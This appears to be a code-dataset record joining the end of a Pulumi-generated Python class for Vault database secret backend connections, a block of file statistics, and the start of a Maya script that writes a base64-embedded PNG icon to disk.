hana: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']]] = None,
mongodb: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']]] = None,
mongodbatlas: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']]] = None,
mssql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']]] = None,
mysql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']]] = None,
mysql_aurora: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']]] = None,
mysql_legacy: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']]] = None,
mysql_rds: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']]] = None,
postgresql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']]] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']]] = None,
verify_connection: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
## Import
Database secret backend connections can be imported using the `backend`, `/config/`, and the `name` e.g.
```sh
$ pulumi import vault:database/secretBackendConnection:SecretBackendConnection example postgres/config/postgres
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SecretBackendConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Database secret backend connections can be imported using the `backend`, `/config/`, and the `name` e.g.
```sh
$ pulumi import vault:database/secretBackendConnection:SecretBackendConnection example postgres/config/postgres
```
:param str resource_name: The name of the resource.
:param SecretBackendConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SecretBackendConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']]] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']]] = None,
hana: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']]] = None,
mongodb: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']]] = None,
mongodbatlas: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']]] = None,
mssql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']]] = None,
mysql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']]] = None,
mysql_aurora: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']]] = None,
mysql_legacy: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']]] = None,
mysql_rds: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']]] = None,
postgresql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']]] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']]] = None,
verify_connection: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SecretBackendConnectionArgs.__new__(SecretBackendConnectionArgs)
__props__.__dict__["allowed_roles"] = allowed_roles
if backend is None and not opts.urn:
raise TypeError("Missing required property 'backend'")
__props__.__dict__["backend"] = backend
__props__.__dict__["cassandra"] = cassandra
__props__.__dict__["data"] = data
__props__.__dict__["elasticsearch"] = elasticsearch
__props__.__dict__["hana"] = hana
__props__.__dict__["mongodb"] = mongodb
__props__.__dict__["mongodbatlas"] = mongodbatlas
__props__.__dict__["mssql"] = mssql
__props__.__dict__["mysql"] = mysql
__props__.__dict__["mysql_aurora"] = mysql_aurora
__props__.__dict__["mysql_legacy"] = mysql_legacy
__props__.__dict__["mysql_rds"] = mysql_rds
__props__.__dict__["name"] = name
__props__.__dict__["oracle"] = oracle
__props__.__dict__["postgresql"] = postgresql
__props__.__dict__["root_rotation_statements"] = root_rotation_statements
__props__.__dict__["snowflake"] = snowflake
__props__.__dict__["verify_connection"] = verify_connection
super(SecretBackendConnection, __self__).__init__(
'vault:database/secretBackendConnection:SecretBackendConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']]] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']]] = None,
hana: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']]] = None,
mongodb: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']]] = None,
mongodbatlas: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']]] = None,
mssql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']]] = None,
mysql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']]] = None,
mysql_aurora: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']]] = None,
mysql_legacy: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']]] = None,
mysql_rds: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']]] = None,
postgresql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']]] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']]] = None,
verify_connection: Optional[pulumi.Input[bool]] = None) -> 'SecretBackendConnection':
"""
Get an existing SecretBackendConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SecretBackendConnectionState.__new__(_SecretBackendConnectionState)
__props__.__dict__["allowed_roles"] = allowed_roles
__props__.__dict__["backend"] = backend
__props__.__dict__["cassandra"] = cassandra
__props__.__dict__["data"] = data
__props__.__dict__["elasticsearch"] = elasticsearch
__props__.__dict__["hana"] = hana
__props__.__dict__["mongodb"] = mongodb
__props__.__dict__["mongodbatlas"] = mongodbatlas
__props__.__dict__["mssql"] = mssql
__props__.__dict__["mysql"] = mysql
__props__.__dict__["mysql_aurora"] = mysql_aurora
__props__.__dict__["mysql_legacy"] = mysql_legacy
__props__.__dict__["mysql_rds"] = mysql_rds
__props__.__dict__["name"] = name
__props__.__dict__["oracle"] = oracle
__props__.__dict__["postgresql"] = postgresql
__props__.__dict__["root_rotation_statements"] = root_rotation_statements
__props__.__dict__["snowflake"] = snowflake
__props__.__dict__["verify_connection"] = verify_connection
return SecretBackendConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowedRoles")
def allowed_roles(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of roles that are allowed to use this
connection.
"""
return pulumi.get(self, "allowed_roles")
@property
@pulumi.getter
def backend(self) -> pulumi.Output[str]:
"""
The unique name of the Vault mount to configure.
"""
return pulumi.get(self, "backend")
@property
@pulumi.getter
def cassandra(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionCassandra']]:
"""
A nested block containing configuration options for Cassandra connections.
"""
return pulumi.get(self, "cassandra")
@property
@pulumi.getter
def data(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
"""
return pulumi.get(self, "data")
@property
@pulumi.getter
def elasticsearch(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionElasticsearch']]:
"""
A nested block containing configuration options for Elasticsearch connections.
"""
return pulumi.get(self, "elasticsearch")
@property
@pulumi.getter
def hana(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionHana']]:
"""
A nested block containing configuration options for SAP HanaDB connections.
"""
return pulumi.get(self, "hana")
@property
@pulumi.getter
def mongodb(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMongodb']]:
"""
A nested block containing configuration options for MongoDB connections.
"""
return pulumi.get(self, "mongodb")
@property
@pulumi.getter
def mongodbatlas(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMongodbatlas']]:
"""
A nested block containing configuration options for MongoDB Atlas connections.
"""
return pulumi.get(self, "mongodbatlas")
@property
@pulumi.getter
def mssql(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMssql']]:
"""
A nested block containing configuration options for MSSQL connections.
"""
return pulumi.get(self, "mssql")
@property
@pulumi.getter
def mysql(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysql']]:
"""
A nested block containing configuration options for MySQL connections.
"""
return pulumi.get(self, "mysql")
@property
@pulumi.getter(name="mysqlAurora")
def mysql_aurora(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysqlAurora']]:
"""
A nested block containing configuration options for Aurora MySQL connections.
"""
return pulumi.get(self, "mysql_aurora")
@property
@pulumi.getter(name="mysqlLegacy")
def mysql_legacy(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysqlLegacy']]:
"""
A nested block containing configuration options for legacy MySQL connections.
"""
return pulumi.get(self, "mysql_legacy")
@property
@pulumi.getter(name="mysqlRds")
def mysql_rds(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysqlRds']]:
"""
A nested block containing configuration options for RDS MySQL connections.
"""
return pulumi.get(self, "mysql_rds")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
A unique name to give the database connection.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def oracle(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionOracle']]:
"""
A nested block containing configuration options for Oracle connections.
"""
return pulumi.get(self, "oracle")
@property
@pulumi.getter
def postgresql(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionPostgresql']]:
"""
A nested block containing configuration options for PostgreSQL connections.
"""
return pulumi.get(self, "postgresql")
@property
@pulumi.getter(name="rootRotationStatements")
def root_rotation_statements(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of database statements to be executed to rotate the root user's credentials.
"""
return pulumi.get(self, "root_rotation_statements")
@property
@pulumi.getter
def snowflake(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionSnowflake']]:
"""
A nested block containing configuration options for Snowflake connections.
"""
return pulumi.get(self, "snowflake")
@property
@pulumi.getter(name="verifyConnection")
def verify_connection(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the connection should be verified on
initial configuration or not.
"""
return pulumi.get(self, "verify_connection")
| 51.533724
| 183
| 0.691515
| 5,207
| 52,719
| 6.844056
| 0.042635
| 0.085501
| 0.08957
| 0.056178
| 0.933889
| 0.918876
| 0.904117
| 0.89915
| 0.897719
| 0.888318
| 0
| 0.000024
| 0.210702
| 52,719
| 1,022
| 184
| 51.584149
| 0.856408
| 0.313151
| 0
| 0.88707
| 1
| 0
| 0.202423
| 0.149717
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166939
| false
| 0.001637
| 0.011457
| 0
| 0.278232
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c69fa576f35fa99fb34382b56a28b12363a03a0a
| 14,053
|
py
|
Python
|
python-scripts/gt_generate_icons.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
python-scripts/gt_generate_icons.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
python-scripts/gt_generate_icons.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
"""
GT Generate Icons - Generates icons used by GT Tools menu
@Guilherme Trevisan - TrevisanGMW@gmail.com - 2020-11-03 - github.com/TrevisanGMW
1.0 - 2020-11-03
Initial Release
Creates Maya to Discord Icon
1.1 - 2020-12-11
Creates fSpy Importer Icon
"""
import maya.cmds as cmds
import base64
import os
def gt_generate_icons():
icons_folder_dir = cmds.internalVar(userBitmapsDir=True)
# GT Maya to Discord Icon
gt_mtod_icon_image = icons_folder_dir + 'gt_maya_to_discord_icon.png'
gt_fspy_icon_image = icons_folder_dir + 'gt_fspy_importer.png'
if os.path.isdir(icons_folder_dir):
# Maya to Discord
image_enconded = 'iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAACXBIWXMAAAsTAAALEwEAmpwYAAAF8WlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDggNzkuMTY0MDM2LCAyMDE5LzA4LzEzLTAxOjA2OjU3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIwLTA3LTA1VDE5OjU2OjQwLTA3OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMC0wNy0wN1QxNToyNToyOS0wNzowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAyMC0wNy0wN1QxNToyNToyOS0wNzowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo3ZGNlNzRhMi04YTE3LTI4NDItOGEwMy1lZWZmYzRjNGVkYWEiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDpkNjdiM2JkNy1iMjk3LWI3NDItOTNkOC0wYTYyZjZhYzUzMmYiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDplOTM5YzQ0Yi1lNjdkLWJjNGMtYWMyZS00YmY3ZjcwYzgzODAiPiA8eG1wTU06SGlzdG9yeT4gPHJkZjpTZXE+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjcmVhdGVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmU5MzljNDRiLWU2N2QtYmM0Yy1hYzJlLTRiZjdmNzBjODM4MCIgc3RFdnQ6d2hlbj0iMjAyMC0wNy0wNVQxOTo1Njo0MC0wNzowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjAgKFdpbmRvd3MpIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo3ZGNlNzRhMi04YTE3LTI4NDItOGEwMy1lZWZmYzRjNGVkYWEiIHN0RXZ0OndoZW49IjIwMjAtMDctMDdUMTU6MjU6MjktMDc6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4wIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7Q7fCFAAAIwklEQVR4nO3bf6xlVXUH8M/a5755w/BDfmaYCunAkyq22hFQbClia1sZMBicaIc2bWJqajQpwR9pY6TYKkk1jiBNbZpQq40mVCI60USjERqIP+LQoQRSx6hjfxEjTQpl+DXMu3cv/zjn3nnvdWbefe/O64Uw32TlnZx7ztrfvc7aa+299n6RmZ7PKNMmMG0cM8C0CUwbxwwwbQLTxjEDTJvAtPG8N0Dvpk8v/1AmOUBQGhI5TwZlFgOikuEkXCRskd6LH0f6taGe2iCJbHXp5mARXRvRSlOHDZPhdmzDjRHuq3331r6fzKxvOdXSvh+oWt0l22sxhgHGsdJSjLgn0gul7RmuxiUj4mjCo8LMIM2X4fNj6O46Tmuw06SCGzKJQlnne5m+KHwW3x/aczVY1RDI9s3NUdyhegg7RNv5YBeujvbD/KJiftTKSlkGwuukyHQl7haU4qXJ+zPsCe6JtCVXox/xsU8t/1kWDYGe87P6uPDboy+a9mX1IT23YL7UtveV85JXRniR9PPYhFNwItZrPTDQx348Lvyv9DD+E3uD3ZUHZde/dri8NcIHcdYCY+3CtdJ3VzIExjZAO8B8WPGnS1z5ffiwJIumpqt6XJ68AT+3PIWx8Ai+knxNuCMGng5kY7t02+Ie+ftSvSM5kOMYYMcYBpB+BV/C6Qvu3hb8bud6WyO8P2sXA9Ye9zfhpspnsvWMP8/wgY4rrTddg52xTPfio5888hMRzsS/aV1WUnvFNYXbDwxsi/AprUtPAzV4j/Dxmi6M9DXhtAW/XyjcdyQFRwyCbQxyg67z+FHwlmRTPz0mfN70Ok+b8W7OlHij9qvvwjCTfGTQcCSJz9x2aA/oBU/0XfjIM/65OTiWvqINZK+YJPWsBaIlszfTA7gKjcAzri7zdh7uU/f2HTj0DyU4UL17QScHeL02Oz+rOk8XqJnDuRZMU0rPu5rGzsMFxN6Tg8Mo5OxI25sYzV+ao0t5zdCN3HZWmI3XPMNrpHsO9XDpJYcU3ldCec5XDJNS/Ul0U/ClUobz7yWyIXnLtLkfNYQrozhXYamUob8sFG1EPe2Qyp6jiOrNZcD/kb52HrpQkt+bKtu1QHhrLQyWSGm00W0ohRfjyqmSXQMkLxZ+o0Tr9iNZOv6xdcpc1wyFNywd7r2lUT7C68dZtz8Xkek3l05gyuKU4GTp0unQ+3/By0raUiojWZgVcAWOP6pNTjBlXAtHrFy9KAjO9pjtsX6GErbWCVsN9kT6A1wgXaK6MXlqJXuwbaVNNuETwWuxJdgWfHsyduCyZsBQ4qML6gGR9uAlq9Uc4Qu9tG1Q22JlVmpl5jjnR/Xt+b6TyzIekUnTa8drSXfSpuZSdVZxs3TdajnisWgrSU9AUelkzgSdx33YtvBDZ7Sx5fhqz4bqinGUJDakN59Q3Tksri75/V34wgQ8X1DDBYNgEJQZrEOPl0/i/ZE+oDKoB8vUidl17UUN35kpvnSkNhJN8WBNn89gXXOw1D1qZ4DqQ6vlmSjVlnUDZgaUQaFfqGHLBPHqsX74p360ug5o185Nad13X/JEMuAfjtRGZ7TbngweD57q3D6K9iutI1q5X/j+qqNkePVoLZB9sk+mX12lOnhIeHI4u8jhZsWgrSZHJwb2LqcoqwdHnAbUQVeVXiL4j1WVwZFcOqwC9Oo8wvFl1kUrVzdC06uLb2Tr9ks5jrMR01v4TkZrjNKV5Rfcn6Q+cVavMVfC3hLrKbPOwckTKNyc4dTsvr5gmE5j8fLzl5ZTVMLFpbQTlKb7m52eLj0OPf9FqyUb2D9w3hN9ynEzzDTOnfCs1PooLh+upoazqhgm9NqK9LblFCXbh4kph73t1ilVG1tquBSbV0u2YjbMnTiKAdXmSYt8tdoR805qDhwkzaIaw5s4uFF6BGyOcO3CIubw28wETVDYMRlbknMSZf+A+eqcSYucwSbhLmE2YxSohj9eEeGOFbC7RXr7kOnodnv9ZbxqQq76afPT1fpezpqNvrO6ra+JkOHCQXg40q2l2I0N2VaXrloxyfS3wjXCP5b0iHR+DW/XluUnRnBWSRt7ud8Z0dh0FOvcL8j03himxAliS3IZLith1Sn/MHoVNvaKM0tUZ0TauCaF/qPE+mivCru5wOkZNpay3umKU5Zp5WHtDu1zBfvwk2WeOWG+Or1E3xnSKcs8fDI+jW8cBXJrjd34Gwf3Mw+LwhlFu4e/3EmRWbwx+GCE6591+2K6zBs+EeGPtDWEU8d47dSS/Mh47j2n3Rz9elQR3P6sKB22AfKewkkl/KW0E68e483M8MOCncZMU8kJNe0S3qb6nUhzwl2rZz8Zgn9pwsWlcZl0yaB6qHL2mK9fI/3d0PW/hV8IHh+jURluFR4I/qem11VOjPDHER5YbWdWgL3B9dgYxQVZ7VJ9PcNXh/zGwK/jcxA7PtmeMele3FjDV0u2+/9j4s+CG1M7Tc3iJbX6raheleGXcZ4xAtJhMNAO0Qci3JvcWbmv6abaNf1hcKsx+p0o4b/qwNbkX5umnaOMDFB0lbH2+t3Sx1ZAdL90c+HGLJ4aLoIqIpyQYU46G2dq9xxPwgbMdO/38TT2CY9E+mnyUPJj6dEo3Vb3wfau055cWS57jTrfcFOE9/Rr2/EyPLS50AOyM4AgqrkIfy1dvgJDPIq7It2QfG90grOrDY4z244hEd1Rt4O9fmEJf5HtztX4p8/CruSdM9VuwXwuNsAh019Xg9tbw1btQumLYzZ3CrbVsK4umb6uNGMMnw/dCjvMZ9hu/M7fnbwCFwe702jrbxEOnf8XP/jvTfGmJmySrhO+oXXXQz0r+X3cH0tuToz03+oSb1zcdl+7b3B9MFfSa5P7l1O7krPCP8UtGW5Zx3G1umhQvEx1qfByvBQfkT67iPewILBKIyyoAAm+iWvxV/iBak8Ud9fqwVLdm43HrLC5OPZvc89zHDPAtAlMG8cMMG0C08YxA0ybwLTxvDfAzwB7KURH1CLqQgAAAABJRU5ErkJggg=='
image_64_decode = base64.decodestring(image_enconded)
image_result = open(gt_mtod_icon_image, 'wb')
image_result.write(image_64_decode)
image_result.close()
# fSpy Importer
